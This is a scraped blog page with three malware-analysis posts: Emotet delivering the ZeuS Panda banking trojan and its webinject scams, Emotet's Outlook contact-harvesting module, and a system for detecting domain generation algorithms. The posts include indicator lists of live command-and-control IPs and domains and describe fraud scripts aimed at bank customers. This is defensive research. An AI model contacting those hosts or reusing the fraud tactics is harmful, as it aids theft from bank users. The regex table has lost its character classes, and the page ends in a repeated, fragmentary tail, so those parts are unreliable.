https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/ Author Anders Fogh Posted on January 5, 2018January 8, 2018

BANKING USERS

Emotet is currently one of the prevalent threats on the Internet. The former banking trojan is now known to steal passwords and to drop other malware like Dridex on its infected machines. We recently found Emotet spreading Zeus Panda, which presented us with an opportunity to link some of our

research on Emotet

with our

analysis of ZeuS Panda

. The

Zeus Panda sample used in this wave is rolled out through Emotet in german-speaking countries and targets online banking users in Germany

and Austria.

The Emotet C2 server drops additional malware to infected system. Whether a system receives such a package seems to be based on the geographical location of the infected system in question. After the additional malware is downloaded from the C2 server, it is written to a file in %ALLUSERSPROFILE% (C:\ProgramData in recent Windows versions) with a random name of 4 to 19 characters length and the file extension “.exe”. Emotet is capable of executing this binary in two different ways, either of which is chosen by the C2 server. The first mode executes the malware in the same context that Emotet is running in, the second mode executes the malware in the context of the currently logged-on user. As stated above, the current wave downloads and executes

the well-known

ZeuS

Panda banking trojan. To know which banking sites it should attack and how to modify the site’s content, the trojan needs so-called webinjects. From the URL masks of the webinjects this sample uses, we can tell that it currently targets online banking customers in Germany and Austria. All injects write a single script reference into the targeted websites. When the targeted site is loaded, the browser loads the referenced script, which is then executed in the context of the banking website. The only difference between the webinjects is the last number in the URL of the script source. This number seems to define the targeted website, which allows the server to deliver a target-specific script. The script actually downloaded is obfuscated by a simple string encryption. The actual script is part of an Automated Transfer System (ATS) which tries to persuade the user into transferring money to an account the attacker specifies. The above screenshots show an exemplary representation on the modification of the banking websites. They show two different attack scenarios: The first script tries to trick the user into performing an transaction in the guise of a security check. The attackers “inform” the customer of newly installed security measures on the banking website, coercing the user to complete a training using a demo account, before they are able to access their account again. During this training, a real transaction is made in the background to an account that the attacker specifies. The phrasing in the text is lousy and should raise suspicion with

most customers.

The second script tries to persuade the user that an erroneous transfer was made to their account. It suggests to go to a bank branch or make the return transfer online. Additionally, the script blocks access to the banking account until the return transfer has been completed. The phrasing in the text is better than in the first script and may not raise suspicion at first glance. The first script resembles word by word the webinject Kaspersky identified during their analysis of Emotet in 2015. At this time Emotet contained its own banking trojan capability and delivered the webinjects directly into the browser. As ZeuS Panda uses the same webinject format as the old Emotet, we can speculate about the reasons: * The webinject is acquired from the same creator * The group behind Emotet has dropped developing their own banking trojan and acquires such trojans from other malware authors * The group behind Emotet developed multiple banking trojans for its own use and for sale It seems Emotet is not only used to sell distribution of malware, but also used by its owners. It is also possible that the group behind Emotet uses the slim downloader as an entry point for targeted attacks. In this case the group can spread Emotet worldwide and distribute specific malware to each target. As the real malicious payload is only downloaded after some time and only to specific targets, analysts can not directly draw conclusions on the real intention of an infection.

IOCS

EMOTET:

C2:

5.9.195.154

45.73.17.164

60.32.214.242

85.25.33.71

194.88.246.242

213.192.1.170

217.13.106.16

217.13.106.246

217.13.106.249 SHA256:

0d25cde8d49e1bcf6a967c0df6ac76992ff129ea5c30a1492a5bedd313e6fb51 c287a9aa25ed6afc54bc5ebe4b098675f3fa4b7cb51fbdcfb50591b4b8fa3b90

ZEUS PANDA:

C2:

uamanshe.gdn

ugjeptpyour.top

SHA256:

4fe20a9cf5e5c28ec55aa529179f7fe6df3cda8ae43340b04b2402f43dfefd5f fbd9e31cc5cbfce2b8135234fdcfdac7fa48a127aa6f3644d05c6ba77bd6d903 Author Anton Wendel Posted on November 27, 2017November 27, 2017

Categories

analysis Tags banking

, Emotet

, malware

, security research

, trojan

, webinject

, zeus

, zeus panda

EMOTET HARVESTS MICROSOFT OUTLOOK The original German blog post can be found on the G DATA Blog

.

Emotet has been known as a trojan for years. Former versions focused on attacking online banking users, however the current Emotet was transformed into a downloader and information stealer. The first reports of this new variant were published by CERT Polska

in April

2017. Since then, Emotet has been spreading through spam phishing mails containing a link to a Microsoft Word document that acts as dropper for the Emotet binary. Recently, CERT-Bund

again warned

about the spam mails which spread Emotet. The sender address of these emails is spoofed to appear as a sender known to the recipient. This strengthens the trust in the mail and increases the probability that the recipient opens the attachment or link without further

consideration.

For this to work, the entities spreading Emotet need to have at least superficial knowledge of the social network a target interacts with via email. Acting opportunistically Emotet delivers a specific module to infected systems to harvest all emails in Microsoft Outlook accounts of the current user, allowing it to extract the relations between sender and receiver. To obtain the information from Outlook, the module takes advantage of the standardized interface MAPI

. The picture

above shows the loading of the MAPI-DLL and the retrieval of the needed functions. Utilizing this interface, the module iterates through all Outlook profiles it can access on the computer. It extracts all E-Mail-Account Names and E-Mail-Addresses from each profile. Afterwards it searches for emails recursively in each folder in the profile. From each mail found it extracts the sender (displayed name and mail address) and all recipients (displayed names and mail addresses) inclusive the recipients in the CC- and BCC-fields and saves them in relation to each other. The picture below shows the extracted fields from the emails. In case a field only contains a reference to an address book entry, the module extracts the name and email address from the address book. In this process only the mail header is evaluated, the content of the mails is not analyzed. After the Emotet module has searched all profiles, folders, and emails, it writes the data it has retrieved in a temporary file in the directory %PROGRAMDATA%. The email addresses are sorted descending by how often they occur. Each address is extended with all contacts, that are in relation to it. However, two cases are distinguished: * if the referenced contact is the sender of the mail, it is extended with all recipients * if the referenced contact is the recipient of the mail, it is only extended with the sender Example (Mailbox of A): Mail 1: A sends to B and C Mail 2: D sends to A Mail 3: C sends to A , D, and E A is referenced three times and therefore is placed on top of the list. A has a relation to B and C through mail 1, thus B and C get connected with A. Mail 2 shows a connection from D to A, thus D gets connected with A too. The relation from C to A in mail 3 is ignored, because it is already captured in mail 1 (A→C). Mail 3 contains the additional relations C→D and C→E. As no relations between C↔D and C↔E are already in the list, the contacts D and E get assigned to the contact C and are appended to the list. The complete list, which gets transferred to the attacker, looks like

this:

A; B; C; D C; D; E Afterwards the module encrypts the file, transfers it to the attacker and removes it from disk. This allows the attacker to get a condensed but comprehensive overview of the social network graph behind a victims email communications. With such a list, an attacker has knowledge of the relation between persons and can send spam mails with suitable sender header without great afford. Additionally, an attacker learns relations between contacts whose computers are not yet infected. To deliver the spam mails to the suitable recipients, the attacker needs valid E-Mail accounts. For this task, they use an additional module that is able to extract the credentials from mail programs and transfer them to the attackers. To extract the credentials from all common mail programs, such as Microsoft Outlook, Mozilla Thunderbird, and Windows Mail, this module utilizes an integrated copy of the application _Mail PassView _from the company NirSoft. It writes this information to a temporary file, which is then encrypted and transfered to the attacker. Once transfered the temporary file is deleted. Author Anton Wendel Posted on October 12, 2017November 24, 2017

Categories

analysis Tags Emotet

, security research

, trojan

DGA CLASSIFICATION AND DETECTION FOR AUTOMATED MALWARE ANALYSIS

INTRODUCTION

Botnets are one of the biggest current threats for devices connected to the internet. Their methods to evade security actions are frequently improved. Most of the modern botnets use _Domain Generation Algorithms_ (DGA) to generate and register many different domains for their _Command-and-Control_ (C&C) server with the purpose to defend it from takeovers and blacklisting attempts. To improve the automated analysis of DGA-based malware, we have developed an analysis system for detection and classification of DGA’s. In this blog post we will discuss and present several techniques of our developed DGA classifier. The DGA detection can be useful to detect DGA-based malware. With the DGA classification it is also possible to see links between different malware samples of the same family. Such a classification is expressed with a description of the DGA as a regex. Moreover, our analysis methods are based on the network traffic of single samples and not of a whole system or network, which is a difference to most of the related work.

DGA-BASED BOTNETS

A _Domain Generation Algorithm_ (DGA) generates periodically a high number of pseudo-random domains that resolve to a C&C server of a botnet . The main reason of its usage by a botnet owner is that it highly complicates the process of a takeover by authorities (Sinkholing). In a typical infrastructure of a botnet that uses a static domain for the C&C server, authorities could take over the botnet with cooperation of the corresponding domain registrar by changing the settings of the static C&C domain (e.g. changing the DNS

records).

Typical infrastructure of a botnet With the usage of a DGA that is generating domains dynamically which resolve to the C&C server there is no effective sinkholing possible anymore. Since the bots use a new generated domain after every period to connect to the C&C server, it would be senseless to take control of a domain that is not used anymore by the bots to build up a connection

to the C&C server.

Typical infrastructure of a DGA

botnet

The C&C server and the bots use the same DGA with the same seed, so that they are able to generate the same set of domains. DGA’s use mostly the date as a seed to initialize the algorithm for domain generation. Hence the DGA creates a different set of domains everyday its run. To initialize a connection to the C&C server the bot needs to run first the DGA to generate a domain, that could be possibly also generated on the side of the C&C server, since both are using the same algorithm and seed . After every domain generation, the bot attempts to resolve the generated domain. These steps are repeated until the domain resolution succeeds, so that the bot figures out the current IP address of the corresponding C&C server. Through that DGA domain the bot can set up a connection to the C&C server.

MOTIVATION

DGA detection can be very helpful to detect malware, because if it is possible to detect the usage of a DGA while analyzing the network traffic of a single sample, then it is very likely that the analyzed sample is malicious, since DGA’s are used commonly by malware but not by benign software. DGA classification is the next step in the analysis after a DGA has been detected. A successful classification returns a proper description of a DGA. With such a unified description, it is possible to group malware using the same DGA. Being able to group malware by correlating characteristics, leads to an improvement to the detection of new malware samples of these families. Therefore, the signatures of recently detected malware samples will be automatically blacklisted. The following figure shows for an non-DGA malware that grouping malware families based on the same domains in their DNS requests traffic will be only possible, if they use all the same and static C&C domain: Two samples using the same static C&C domain If the malware uses a DGA, then the grouping of malware will not be trivial anymore, because generated DGA domains are just used temporarily, thus using those to find links between samples would not

be very effective.

Two samples with the same DGA but a different seed Note also that occurring domains in the network traffic of the recently analyzed malware sample could differ on another day with the same sample analyzed, since many DGA’s use the date as a seed. The solution is to calculate a seed-independent DGA description for every analyzed sample using a DGA. That description can be used then as a bridge between malware samples using the same DGA. Pattern descriptor to abstract different DGA seeds To solve this problem, we have divided it into three smaller tasks. Thus, the DGA classifier is structured into three components. Each component solves a task that contributes to the result of the DGA

classification.

In this blog post we concentrate only on approaches for DGA detection and classification that are automatable, since we want to analyze a very high number of samples. Furthermore, we want to avoid as much as possible unnecessary network traffic, therefore we focus only on

offline methods.

DGA DETECTION

This approach for DGA detection is based on statistical values calculated over the relevant label attributes of the domains. Since the domains generated by a DGA follow mostly a pattern, it is very useful to calculate the standard deviation of some attribute values . The average value can be also used for some attribute values to measure whether a domain is generated by a DGA or not. Those statistical values are also calculated over a list of domains from the _Top 500 Alexa Ranking_. These are considered as reference values for non-DGA domains regarding the relevant label attributes. The domains with multiple levels are split into their labels for

further analysis.

E.g. this domain: _http://www.developers.google.com_ is split into: _com_ – Top-level domain (TLD) _google_ – Second-level domain _developers_ – Third-level domain _www_ – Fourth-level domain All domains in the domain list resulting from a sample are compared level-wise, such that the labels of every domain are only compared with the same level. To find proper indicators for DGA usage, we have done a level-wise comparison of statistical values calculated over several lexical properties of DGA domains and non-DGA domains (e.g. from _Top 500

Alexa Ranking_).

Different kinds of DGA patterns Our experiments have proven that these statistical values over domain levels are very effective for DGA detection: * Average of the . . . * number of used hyphens * maximum number of contiguous consonants * Standard deviation of the . . . * string length of the label * consonant and vowel ratio

* entropy

* Redundancy of substrings or words in case of a wordlist DGA With all these arguments, we can build a score with a specific threshold. If the score exceeds the threshold, the component will decide that the analyzed domain list was generated by a DGA. Since the arguments are based on statistical values, which lose their significance with smaller sets, it is also important to consider the case with too few domains. In this regard, the score is scaled down. SEPARATION OF NON-DGA DOMAINS Malware tries often to connect at first to a benign host (e.g. google.com) to check their connectivity to the internet. So, in case of DGA-based malware, the samples do not only send requests to DGA domains, but also to non-DGA domains. Hence the program for DGA classification needs to expect a domain list containing DGA domains and non-DGA domains. Before the program can classify a DGA, it needs to filter out the non-DGA domains. In this process, we assume that the majority of the domains in the domain list of the sample are DGA domains. Therefore, the non-DGA domains are considered as outliers. We used different outlier methods to identify non-DGA domains: * Outlying TLD-label * Outlying www-label * Find outlier with the method of Nalimov regarding following

label attributes:

* String length of the label * Digit and string length ratio * Hyphen and string length ratio * Consonant and vowel ratio * Outlying label count * Find outliers by too few occurring values regarding the following label attributes (the more a value occurs, the higher is the probability that it belongs to a DGA domain. We use the opposite case to find non-DGA domains here): * String length of the label * Consonant and vowel ratio * Digit and string length ratio

* Entropy

* Hyphen and string length ratio * Relative position of the first hyphen in the label

DGA CLASSIFICATION

After the separation process of DGA domains from non-DGA domains, we start with the classification of the DGA. The classifier analyzes the list of DGA domains and creates a, specific as possible, regex that matches all these DGA domains. If the separation is not completely successful, the program will continue with the classification based on DGA domains and non-DGA domains which could lead to a wrong description of the DGA. But not every failing separation process causes a wrong classification. In some cases, if non-DGA domains cannot be differentiated from DGA domains regarding any domain attributes, then the classification will still return the correct DGA description, since it covers only the relevant domain attributes. If the failing separation process causes a wrong DGA description, then the resulting wrong or imprecise DGA description could be interpreted still as a fingerprint calculated over the requested non-DGA domains and the DGA domains. That fingerprint is still useful to group malware of the same family, because it is very common that those requested non-DGA domains occur in other malware samples of the same family,

too.

DGA’s do not generate necessarily always the same set of domains, because in most cases the seed of the DGA is changed (usually the date

is used as seed).

In the following picture, you can see that the calculated DGA regexes are not matching because of the differentiating first letter, which seems to be seed-dependent in that case: DGA with seed dependent first character An important requirement to the automatically generated DGA description is that it needs to be independent of the seed. Since it is in our perspective not possible to determine which part of a DGA domain is seed dependent, we use an approach that tries to generalize the seed-dependent part of a domain. For this task, we use three layers of regexes that are hierarchically

arranged:

* Layer: very generalized pseudo-regex * Layer: generalized regex * Layer: specific regex All those regexes can be interpreted as DGA descriptions (calculated with only one sample) of the same DGA with different precision. Such hierarchy could look like this:

Tinba-DGA Simda-DGA

EVALUATION

Out of 113.993 samples, the DGA classifier detects 782 DGA-based

malware samples.

To determine the false positive rate, we have reviewed the results of the analysis system manually. Regarding the DGA detection we have found 38 false positives in our result set. Hence we have a false positive rate that is lower than 0.049% (with the assumption that the DGA-based malware samples queried a relative high number of different domains). A false negative evaluation is hard in this case, because the number of input sample is too high for manual evaluation. For an automatic false negative evaluation, the required ground truth of a large sample set is missing. The following excerpt shows some specific DGA regexes from the DGA classification, which used 38.380 DGA-based malware samples as input: Domain Fingerprint / Regex

Matches

Family name

{8}\.kuaibu8\.cn

569 Razy

{3}y{3}\.com

2082

simda

{11}\.eu

829 simda

{6,12}\.(com|info|net|org|dyndns\.org)

2047

Pykspa

{12}\.(com|in|net|ru)

8508

tinba

{12}\.com

6296

tinba

{12}\.pw

7714

tinba

{12}\.(biz|pw|space|us)

35 tinba

{12}\.(cc|com|info|net)

17 tinba

{12}\.(com|in|net|ru)

172 tinba

{12}\.(com|in|net|ru)

110 tinba

{12}\.(com|in|net|ru)

45 tinba

{12}\.(com|in|net|ru)

110 tinba

{8}\.info

216 tinba

v{1}\.{7}\.ru

77 Kryptik

v1\.{7}\.ru

579 {7,11}\.(com|net)

113 {8}\.{3}i{2}8\.cn

114 {6,19}\.com

644 Ramnit

{14,16}\.(biz|com|info|net|org)

173

It is conspicuous that the Tiny Banker Trojan (Tinba) has a very high occurrence with different specific regexes in the result set. After generalizing the most regexes of Tinba, as described in section 2.3, it will be possible to group all samples with only one regex. The missing family names are given by the fact that we could not detect automatically to which malware family the samples that used the DGA

belongs.

CONCLUSION

The result shows that DGA detection and DGA classification can be very useful to detect new malware samples by their DGA. Hence it is also possible to find links between old and new malware samples of the same family via their classified DGA. The DGA detection seems to be very reliable for samples that have queried many different domains. Our implemented concept for DGA classification seems to be in many cases successful. However, there are still cases where the calculated DGA descriptions are not correct, because the created patterns are sometimes overfitted to the given domain lists or rather non-DGA domains were considered in the calculation of the DGA descriptions, too. To confine this problem, we use a multi-layered regex generalization. Even wrong DGA descriptions can be still considered as fingerprints calculated over the domain list of the sample. That fingerprint could be used to classify the DGA-based malware, so that it makes still a good contribution to automated malware analysis.

LITERATURE

A. Zanker. Detection of outliers by means of Nalimov’s test – Chemical Engineering, 1984. H. Zhang, M. Gharaibeh, S. Thanasoulas, C. Papadopoulos Colorado State University, Fort Collins, CO, USA. BotDigger: Detecting DGA Bots in a Single Network, 2016. R. Sharifnya and M. Abadi – Tarbiat Modares University Tehran, Iran. A Novel Reputation System to Detect DGA-Based Botnets,

2013.

T. Frosch, M. Kührer, T. Holz – Horst Görtz Institute (HGI), Ruhr-University Bochum, Germany. Predentifier: Detecting Botnet C&C Domains From Passive DNS Data, 2013. Author Emanuel Durmaz Posted

on August 30, 2017

POSTS NAVIGATION

Page 1 Page 2 … Page 4

* Twitter

Search for: Search

* August 2020

* March 2019

* November 2018

* September 2018

* March 2018

* February 2018

* January 2018

* November 2017

* October 2017

* August 2017

* July 2017

* March 2017

* February 2017

* December 2016

* November 2016

* October 2016

* September 2016

* August 2016

* July 2016

* June 2016

* April 2016

* March 2016

* analysis

* meta

* opinion

* talks

* workshop

* WTF?

* Imprint

cyber.wtf Blog at WordPress.com.

cyber.wtf

Blog at WordPress.com. You must be logged in to post a comment.

Loading Comments...

Comment

×

Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use. To find out more, including how to control cookies, see here: Cookie

More Annotations

Carole Stephens

2020-02-15 15:30:52

Carole Stephens

2020-02-15 15:31:32

Carole Stephens

2020-02-15 15:31:38

Carole Stephens

2020-02-15 15:33:21

Carole Stephens

2020-02-15 15:33:26

Carole Stephens

2020-02-15 15:33:34

Carole Stephens

2020-02-15 15:35:33

Carole Stephens

2020-02-15 15:36:02

Carole Stephens

2020-02-15 15:36:22

Carole Stephens

2020-02-15 15:36:34

Carole Stephens

2020-02-15 15:37:08

Carole Stephens

2020-02-15 15:37:25

Favourite Annotations

Carole Stephens

2020-01-06 22:32:06

Carole Stephens

2020-01-06 22:32:11

Carole Stephens

2020-01-06 22:32:57

Carole Stephens

2020-01-06 22:33:24

Carole Stephens

2020-01-06 22:33:25

Carole Stephens

2020-01-06 22:33:58

Carole Stephens

2020-01-06 22:34:11

Carole Stephens

2020-01-06 22:34:40

Carole Stephens

2020-01-06 22:35:01

Carole Stephens

2020-01-06 22:35:12

Carole Stephens

2020-01-06 22:35:14

Carole Stephens

2020-01-06 22:48:50

Text

CYBER.WTF

bit.

WTF? – CYBER.WTF

is a not an

TRICKBOT RDPSCANDLL

focused on checking

Zimmer. HRB

TWO COVERT CHANNELS

are not open.

published by

CYBER.WTF

bit.

WTF? – CYBER.WTF

is a not an

TRICKBOT RDPSCANDLL

focused on checking

Zimmer. HRB

TWO COVERT CHANNELS

are not open.

published by

WTF? – CYBER.WTF

is a not an

META – CYBER.WTF

bit.

TWO COVERT CHANNELS

are not open.

analysis for pure

COVERT SHOTGUN

mind, the search